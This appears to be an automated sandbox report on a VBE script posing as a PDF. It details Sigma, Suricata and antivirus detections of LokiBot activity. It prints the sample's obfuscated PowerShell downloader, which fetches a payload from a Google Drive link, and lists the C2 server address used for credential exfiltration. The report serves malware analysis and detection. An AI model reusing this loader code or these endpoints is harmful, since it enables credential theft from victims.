                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: dP, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", ProcessId: 6600, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: dP, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", ProcessId: 6600, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPoly

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:47:04.843116+020020243121A Network Trojan was detected192.168.2.549715137.184.191.21580TCP
                2024-10-01T07:47:07.607129+020020243121A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:47:02.251203+020020253811Malware Command and Control Activity Detected192.168.2.549715137.184.191.21580TCP
                2024-10-01T07:47:04.932136+020020253811Malware Command and Control Activity Detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:47:07.728144+020020253811Malware Command and Control Activity Detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:47:10.515717+020020253811Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:47:13.564544+020020253811Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:47:16.278702+020020253811Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:47:19.097881+020020253811Malware Command and Control Activity Detected192.168.2.549722137.184.191.21580TCP
                2024-10-01T07:47:21.877834+020020253811Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:47:24.642067+020020253811Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:47:27.499223+020020253811Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:47:30.316653+020020253811Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:47:33.034241+020020253811Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:47:35.829673+020020253811Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:47:38.621072+020020253811Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:47:41.697900+020020253811Malware Command and Control Activity Detected192.168.2.549730137.184.191.21580TCP
                2024-10-01T07:47:44.372628+020020253811Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:47:47.079801+020020253811Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:47:49.795411+020020253811Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:47:52.566806+020020253811Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:47:55.539715+020020253811Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:47:58.249624+020020253811Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:48:01.034428+020020253811Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:48:03.781971+020020253811Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:48:06.581937+020020253811Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:48:09.408894+020020253811Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:48:12.173913+020020253811Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:48:14.938921+020020253811Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:48:17.676415+020020253811Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:48:20.422456+020020253811Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:48:23.217240+020020253811Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:47:10.358161+020020243131Malware Command and Control Activity Detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:47:13.404925+020020243131Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:47:16.115599+020020243131Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:47:18.943117+020020243131Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:47:21.708727+020020243131Malware Command and Control Activity Detected192.168.2.549722137.184.191.21580TCP
                2024-10-01T07:47:24.486909+020020243131Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:47:27.345096+020020243131Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:47:30.154608+020020243131Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:47:32.878745+020020243131Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:47:35.676257+020020243131Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:47:38.454235+020020243131Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:47:41.422964+020020243131Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:47:44.201081+020020243131Malware Command and Control Activity Detected192.168.2.549730137.184.191.21580TCP
                2024-10-01T07:47:46.917412+020020243131Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:47:49.642741+020020243131Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:47:52.405586+020020243131Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:47:55.095844+020020243131Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:47:58.090306+020020243131Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:48:00.871063+020020243131Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:48:03.631363+020020243131Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:48:06.420098+020020243131Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:48:09.193755+020020243131Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:48:12.018888+020020243131Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:48:14.774319+020020243131Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:48:17.521559+020020243131Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:48:20.266760+020020243131Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:48:23.061415+020020243131Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:48:25.861936+020020243131Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:47:02.251203+020020216411A Network Trojan was detected192.168.2.549715137.184.191.21580TCP
                2024-10-01T07:47:04.932136+020020216411A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:47:07.728144+020020216411A Network Trojan was detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:47:10.515717+020020216411A Network Trojan was detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:47:13.564544+020020216411A Network Trojan was detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:47:16.278702+020020216411A Network Trojan was detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:47:19.097881+020020216411A Network Trojan was detected192.168.2.549722137.184.191.21580TCP
                2024-10-01T07:47:21.877834+020020216411A Network Trojan was detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:47:24.642067+020020216411A Network Trojan was detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:47:27.499223+020020216411A Network Trojan was detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:47:30.316653+020020216411A Network Trojan was detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:47:33.034241+020020216411A Network Trojan was detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:47:35.829673+020020216411A Network Trojan was detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:47:38.621072+020020216411A Network Trojan was detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:47:41.697900+020020216411A Network Trojan was detected192.168.2.549730137.184.191.21580TCP
                2024-10-01T07:47:44.372628+020020216411A Network Trojan was detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:47:47.079801+020020216411A Network Trojan was detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:47:49.795411+020020216411A Network Trojan was detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:47:52.566806+020020216411A Network Trojan was detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:47:55.539715+020020216411A Network Trojan was detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:47:58.249624+020020216411A Network Trojan was detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:48:01.034428+020020216411A Network Trojan was detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:48:03.781971+020020216411A Network Trojan was detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:48:06.581937+020020216411A Network Trojan was detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:48:09.408894+020020216411A Network Trojan was detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:48:12.173913+020020216411A Network Trojan was detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:48:14.938921+020020216411A Network Trojan was detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:48:17.676415+020020216411A Network Trojan was detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:48:20.422456+020020216411A Network Trojan was detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:48:23.217240+020020216411A Network Trojan was detected192.168.2.549745137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:46:57.524026+020028032702Potentially Bad Traffic192.168.2.549713142.250.184.238443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: http://137.184.191.215/index.php/check.php?id=1Virustotal: Detection: 14%Perma Link
                Multi AV Scanner detection for submitted file
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeReversingLabs: Detection: 15%
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeVirustotal: Detection: 12%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
                Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
